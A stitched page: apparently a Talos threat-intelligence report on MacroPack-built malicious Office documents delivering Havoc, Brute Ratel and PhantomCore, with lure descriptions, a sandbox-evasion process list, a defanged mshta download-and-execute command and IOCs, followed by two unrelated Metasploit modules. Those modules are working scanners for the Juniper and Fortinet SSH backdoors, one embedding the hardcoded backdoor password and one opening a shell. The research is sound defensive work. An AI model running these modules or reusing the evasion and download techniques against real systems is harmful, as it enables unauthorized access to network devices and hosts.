Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests. 

For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows. 

All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors. 

Stages of execution for discovered MacroPack-generated documents.

**Theme 1: Lures uploaded from China**

The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English. 

__Chinese version of the lure.__

All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor. 

__English variant of the lure.__

**Theme 1 payloads**

Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It's free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems. 

The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.

First Havoc demon communication to C2, with appropriate HTTP headers specified in its configuration buffer.

After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.

The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL.  Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors. 

Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:

*   Deploy agents (called badgers) onto target systems.
*   Execute commands remotely.
*   Perform lateral movement within a network.
*   Establish persistence.
*   Evade detection by endpoint security solutions.

The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable. 

Brute Ratel configuration is decrypted by a RC4 decryption routine in the DLL badger.

**Theme 2: Pakistani military lures**

The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.

Pakistani military-themed document lure uploaded to VirusTotal in January 2024. 

The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption. 

The implant in the first document is configured to use DNS over HTTPs with dns\[.\]google and cloudflare-dns\[.\]com servers to tunnel the data over DNS for hosts dns1\[.\]s-logistics\[.\]net and dns2\[.\]s-logistics\[.\]net.

The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation. 

Pakistani military-themed document lure uploaded to VirusTotal in February 2024. 

One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.

Adobe Experience Cloud requests details from the second document.

**Theme 3: Lure uploaded from Russia**

A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see. 

The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual. 

__Partially deobfuscated second stage attempt to download and execute a file from a URL__

_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection. 

When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg. We have no indication that this TTP was successful. 

**Theme 3 payload**

At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage. 

__Before connecting to listen for commands, the C2 host and port are retrieved from PhantomCore data.__

Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command. 

**Theme 4: Uploaded from the U.S.**

 This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages. 

The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems. 

The second stage code will exit any the following conditions are satisfied:

*   Number of logical CPUs in the system is 1.
*   The User name is “USER”.
*   One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
*   The overall disk size is smaller than 60GB.
*   Total memory size is smaller than 1GB.
*   Word Application recent files count is smaller than three.

__Obfuscated function is checking for presence of analysis environment before downloading the payload.__

The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload. 

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63942.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

**Theme 1**

0cf1e59bae9dba7fbbf6ee6a36ca6bdb8fa0ac002b8cf824bd0888789a981c57 -64 bit Havoc demon

hxxps\[://\]122\[.\]114\[.\]141\[.\]214/qq\[.\]com/ab735a258a90e8e1f3e3dcf231bf53a9/mail/ - Havoc C2

93df1d60edd6b656b08e0fc0d31b330fd275f5e1a9069dfbb769e7ba217fcb6e - Brute Ratel loader

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/qazxsw -Brute Ratel C2

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/edcvfr

2131de0cb705afa52f88ef70a87ee6c8662d38db0138efc4940218ee62d8a296 - 32 bit Havoc demon

hxxp\[://\]122\[.\]114\[.\]166\[.\]92/Collectors/3\[.\]0/settings/mail/ - Havoc C2

**Theme 2**

cbafcf65b40d95e4699859a523ef4d300c57f93de6fbc6e194d1b922e9f3aba6 - PAF cyber team lure

b5608e73eb460944d9b523a940d94c95d3eb66d6a8efe82462e2589ccfaadb82 - allotment of plots, Pakistan military

dns1\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

dns2\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php - Brute Ratel C2

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net//HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

**Theme 3**

e1ee389b2af2d3a0eff4aa14f2ac3de6cdd4a73de80b5d450a44ec69cd332dbf - Excel malicious workbook

80731db97c33b50cd3d8727decec7e6a12bbf5f671527648c4cbb559fabc3074 - payload PhantomCore RAT

api.wilbderreis\[.\]ru - PhantomCore C2, using rsocket protocol on port 80

hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg

**Theme 4**

2c0a66c6370b4aa88ab3805d520e868cbc513b43119958257a72c9ff58ef241c - NMLS renewal theme maldoc

hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc

Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads

This Metasploit module scans for the Juniper SSH backdoor (also valid on Telnet). Any username is required, and the password is <<< %s(un=%s) = %u.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  def initialize(info = {})    super(update_info(info,      'Name'           => 'Juniper SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Juniper SSH backdoor (also valid on Telnet).        Any username is required, and the password is <<< %s(un='%s') = %u.      },      'Author'         => [        'hdm',                               # Discovery        'h00die <mike[at]stcyrsecurity.com>' # Module      ],      'References'     => [        ['CVE', '2015-7755'],        ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],        ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']      ],      'DisclosureDate' => '2015-12-20',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    ssh_opts = ssh_client_defaults.merge({      :port            => rport,      :auth_methods    => ['password', 'keyboard-interactive'],      :password        => %q{<<< %s(un='%s') = %u},    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(          ip,          'admin',          ssh_opts        )      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    if ssh      print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")      report_vuln(        :host => ip,        :name => self.name,        :refs => self.references,        :info => ssh.transport.server_version.version      )    end  end  def rport    datastore['RPORT']  endend

Juniper SSH Backdoor Scanner

This Metasploit module scans for the Fortinet SSH backdoor.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::Report  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Fortinet SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Fortinet SSH backdoor.      },      'Author'         => [        'operator8203 <operator8203[at]runbox.com>', # PoC        'wvu'                                        # Module      ],      'References'     => [        ['CVE', '2016-1909'],        ['EDB', '39224'],        ['PACKETSTORM', '135225'],        ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']      ],      'DisclosureDate' => '2016-01-09',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    factory = ssh_socket_factory    ssh_opts = ssh_client_defaults.merge({      port:            rport,      # The auth method is converted into a class name for instantiation,      # so fortinet-backdoor here becomes FortinetBackdoor from the mixin      auth_methods:    ['fortinet-backdoor']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'Fortimanager_Access'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  endend

Tag

#backdoor